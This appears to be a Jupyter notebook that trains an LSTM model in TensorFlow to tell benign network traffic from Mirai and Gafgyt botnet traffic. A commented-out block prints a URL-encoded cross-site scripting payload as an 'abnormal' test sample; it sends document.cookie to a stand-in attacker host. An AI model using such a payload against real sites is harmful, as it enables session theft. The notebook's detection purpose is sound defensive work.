### Code

In [1]:
import tensorflow as tf
#from tensorflow.examples.tutorials.mnist import input_data
from tensorflow.python.ops import rnn, rnn_cell
#mnist = input_data.read_data_sets('MNIST_data', one_hot=True) # Removed
import numpy as np # Included
import pandas as pd
import csv

from numpy import genfromtxt
benign_traffic = genfromtxt('/home/ubuntu/dataset/benign_traffic.csv', delimiter=',')
gafgyt_combo = genfromtxt('/home/ubuntu/dataset/gafgyt_combo.csv', delimiter=',')
gafgyt_junk = genfromtxt('/home/ubuntu/dataset/gafgyt_junk.csv', delimiter=',')
gafgyt_scan = genfromtxt('/home/ubuntu/dataset/gafgyt_scan.csv', delimiter=',')
gafgyt_tcp = genfromtxt('/home/ubuntu/dataset/gafgyt_tcp.csv', delimiter=',')
gafgyt_udp = genfromtxt('/home/ubuntu/dataset/gafgyt_udp.csv', delimiter=',')
mirai_ack = genfromtxt('/home/ubuntu/dataset/mirai_ack.csv', delimiter=',')
mirai_scan = genfromtxt('/home/ubuntu/dataset/mirai_scan.csv', delimiter=',')
mirai_syn = genfromtxt('/home/ubuntu/dataset/mirai_syn.csv', delimiter=',')
mirai_udp = genfromtxt('/home/ubuntu/dataset/mirai_udp.csv', delimiter=',')
mirai_udpplain = genfromtxt('/home/ubuntu/dataset/mirai_udpplain.csv', delimiter=',')

# with open('/home/ubuntu/dataset/benign_traffic.csv', 'r') as csvfile:

#     csvreader = csv.reader(csvfile)
#     next(csvreader,None)
#     output = open('/home/ubuntu/dataset/corrected_benign_traffic.csv', 'wb')
#     writer = csv.writer(output)
#     for row in csvreader:
#         if row[1].isdigit()==True:
#             print(row)
#             #writer.writerow(row)
#     csvfile.close()
#     output.close()

#benign_traffic = pd.read_csv("/home/ubuntu/dataset/benign_traffic.csv")

#benign_traffic.head()
# fx_array=open('Parsed Data/complete_train_rand_xin.npy','rb')
# x_in = np.load(fx_array)

# fy_array=open('Parsed Data/complete_train_rand_yin.npy','rb')
# y_in = np.load(fy_array)

# fxt_array=open('Parsed Data/complete_test_rand_xin.npy','rb')
# xt_in = np.load(fxt_array)

# fyt_array=open('Parsed Data/complete_test_rand_yin.npy','rb')
# yt_in = np.load(fyt_array)


# print("Normal Sample: \n")
# print(" Method: 0\n \
# Content_length:0 \n \
# URL: http://localhost:8080/tienda1/miembros/editar.jsp \n \
# Payload: direccion=Calle+Barrio+Cura-vigo+Vello%2C+134+10%3FD \n")

# print(xt_in[84])
# print("\n")
# print(yt_in[84])
# print("\n")

# print("Abormal Sample:")
# print("\n")
# print(" Method: 0\n \
# Content_length:0 \n \
# URL: http://localhost:8080/tienda1/publico/caracteristicas.jsp \n\n \
# Payload: id=1sessionid%3D12312312%26+username%3D%253C%2573%2563%2572%2569%2570%2574%253E%2564%256F%2563%2575%256D%2565%256E%2574%252E%256C%256F%2563%2561%2574%2569%256F%256E%253D%2527%2568%2574%2574%2570%253A%252F%252F%2561%2574%2574%2561%2563%256B%2565%2572%2568%256F%2573%2574%252E%2565%2578%2561%256D%2570%256C%2565%252F%2563%2567%2569%252D%2562%2569%256E%252F%2563%256F%256F%256B%2569%2565%2573%2574%2565%2561%256C%252E%2563%2567%2569%253F%2527%252B%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565%253C%252F%2573+%2563%2572%2569%2570%2574%253E%3F \n\n \
# Payload Decoded: id 1sessionid 12312312 username script document location http attackerhost example cgi bin cookiesteal cgi document cookie s cript 0 0")
# print("\n")
# print(xt_in[337])
# print("\n")
# print(yt_in[337])

# test_xin_np = np.array([xt_in[84],xt_in[337]])
# test_yin_np = np.array([yt_in[84],yt_in[337]])

# print("Input Test Data:")
# print(type(xt_in))
# print(len(xt_in))
# print(type(xt_in[0]))
# print(len(xt_in[0]))

# print("Input Test Data:")
# print(type(test_xin_np))
# print(len(test_xin_np))
# print(type(test_xin_np[0]))
# print(len(test_xin_np[0]))
# print(test_xin_np[0])

/home/ubuntu/.local/lib/python3.5/site-packages/tensorflow/python/framework/dtypes.py:516: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
  _np_qint8 = np.dtype([("qint8", np.int8, 1)])
/home/ubuntu/.local/lib/python3.5/site-packages/tensorflow/python/framework/dtypes.py:517: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
  _np_quint8 = np.dtype([("quint8", np.uint8, 1)])
/home/ubuntu/.local/lib/python3.5/site-packages/tensorflow/python/framework/dtypes.py:518: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
  _np_qint16 = np.dtype([("qint16", np.int16, 1)])
/home/ubuntu/.local/lib/python3.5/site-packages/tensorflow/python/framework/dtypes.py:519: 

In [ ]:
print(benign_traffic[0:10])
numrows = len(benign_traffic)    # 3 rows in your example
numcols = len(benign_traffic[0]) # 2 columns in your example
print("Dimensions Rows: %s Columns: %s" %(numrows,numcols))

In [ ]:
print(benign_traffic[62660:62666])

In [ ]:
benign_traffic = np.delete(benign_traffic, [0,49549, 62663,101764,277005,339160,437675,489826,526412], axis=0)
gafgyt_combo = np.delete(gafgyt_combo, [0,59719,112732,165747,223900,285281,334812,401482,455766], axis=0)
gafgyt_junk = np.delete(gafgyt_junk, [0,], axis=0)
gafgyt_scan = np.delete(gafgyt_scan, [0,], axis=0)
gafgyt_tcp = np.delete(gafgyt_tcp, [0,], axis=0)
gafgyt_udp = np.delete(gafgyt_udp, [0,], axis=0)
mirai_ack = np.delete(mirai_ack, [0,], axis=0)
mirai_scan = np.delete(mirai_scan, [0,], axis=0)
mirai_syn = np.delete(mirai_syn, [0,], axis=0)
mirai_udp = np.delete(mirai_udp, [0,], axis=0)
mirai_udpplain = np.delete(mirai_udpplain, [0,], axis=0)


In [ ]:
#benign_traffic[~np.isnan(benign_traffic).any(axis=1)]
print(benign_traffic[0:10])
numrows = len(benign_traffic)    # 3 rows in your example
numcols = len(benign_traffic[0]) # 2 columns in your example
print("Dimensions Rows: %s Columns: %s" %(numrows,numcols))

In [ ]:
print(benign_traffic[62660:62666])

In [ ]:
hm_epochs = 10
n_classes = 2
batch_size = 128
chunk_size = 1 # Changed
n_chunks = 115 # Number of attributes in dataset
rnn_size = 30

x = tf.placeholder("float", shape=[None, n_chunks, chunk_size])
y = tf.placeholder("float")
x_t = tf.placeholder("float", shape=[None, n_chunks, chunk_size])
y_t = tf.placeholder("float")

In [ ]:
# x_request = tf.reshape(x, [-1,28,1,1])
# print ("x_request=")
# print (x_request)

In [ ]:
class DataSet(object):
    def __init__(self, requests, labels):
        assert requests.shape[0] == labels.shape[0], ("requests.shape: %s labels.shape: %s" % (requests.shape,
                                                 labels.shape))
        self._num_examples = requests.shape[0]
        # Convert shape from [num examples, rows, columns, depth]
        # to [num examples, rows*columns] (assuming depth == 1)
        requests = requests.reshape(requests.shape[0],
                              requests.shape[1])
        self._requests = requests
        self._labels = labels
        self._epochs_completed = 0
        self._index_in_epoch = 0
        
    def next_batch(self, batch_size):
        """Return the next `batch_size` examples from this data set."""
        start = self._index_in_epoch
        self._index_in_epoch += batch_size
        if self._index_in_epoch > self._num_examples:
            # Finished epoch
            self._epochs_completed += 1
            # Shuffle the data
            #print("=== Current Perm ===")
            #print("=== index_in_epoch === : %s" % self._index_in_epoch)
            perm = np.arange(self._num_examples)
            #print(perm)
            np.random.shuffle(perm)
            self._requests = self._requests[perm]
            self._labels = self._labels[perm]
            # Start next epoch
            start = 0
            self._index_in_epoch = batch_size
            assert batch_size <= self._num_examples
        end = self._index_in_epoch
        return self._requests[start:end], self._labels[start:end]

current_data = DataSet(x_in, y_in)
def recurrent_neural_network(x):
    layer = {'weights':tf.Variable(tf.random_normal([rnn_size, n_classes])),
             'biases':tf.Variable(tf.random_normal([n_classes]))}
    
    x = tf.transpose(x, [1,0,2])
    x = tf.reshape(x, [-1, chunk_size])
    x = tf.split(0, n_chunks, x)
    def make_cell():
        
        lstm_cell = rnn_cell.BasicLSTMCell(rnn_size)
        return lstm_cell
    
    lstm_cell = tf.contrib.rnn.MultiRNNCell(
    [make_cell for _ in range(2)], state_is_tuple=True)
    
    
    #Helper
    #Decoder
    # +  = dynamic
    output, states = rnn.rnn(lstm_cell, x, dtype=tf.float32)

    output = tf.matmul(output[-1],layer['weights']) + layer['biases']

    return output

def train_neural_network(x):
    prediction = recurrent_neural_network(x)
    cost = tf.reduce_mean( tf.nn.softmax_cross_entropy_with_logits(prediction,y) )
    optimizer = tf.train.AdamOptimizer().minimize(cost)
    
    with tf.Session() as sess:
        sess.run(tf.initialize_all_variables())

        for epoch in range(hm_epochs):
            epoch_loss = 0
            for _ in range(int(current_data._num_examples/batch_size)):
                epoch_x, epoch_y = current_data.next_batch(batch_size)
                epoch_x = epoch_x.reshape((batch_size, n_chunks, chunk_size))
                _, c = sess.run([optimizer, cost], feed_dict={x: epoch_x, y: epoch_y})
                epoch_loss += c

            print('Epoch', epoch, 'completed out of',hm_epochs,'loss:',epoch_loss)

        correct = tf.equal(tf.argmax(prediction, 1), tf.argmax(y, 1))

        accuracy = tf.reduce_mean(tf.cast(correct, 'float'))
        print('Accuracy:',accuracy.eval({x:xt_in.reshape((-1, n_chunks, chunk_size)), y:yt_in}))
        #print('Test Abnormal:',accuracy.eval({x_t:test_xin_np.reshape((-1, n_chunks, chunk_size)), y_t:test_yin_np}))

train_neural_network(x)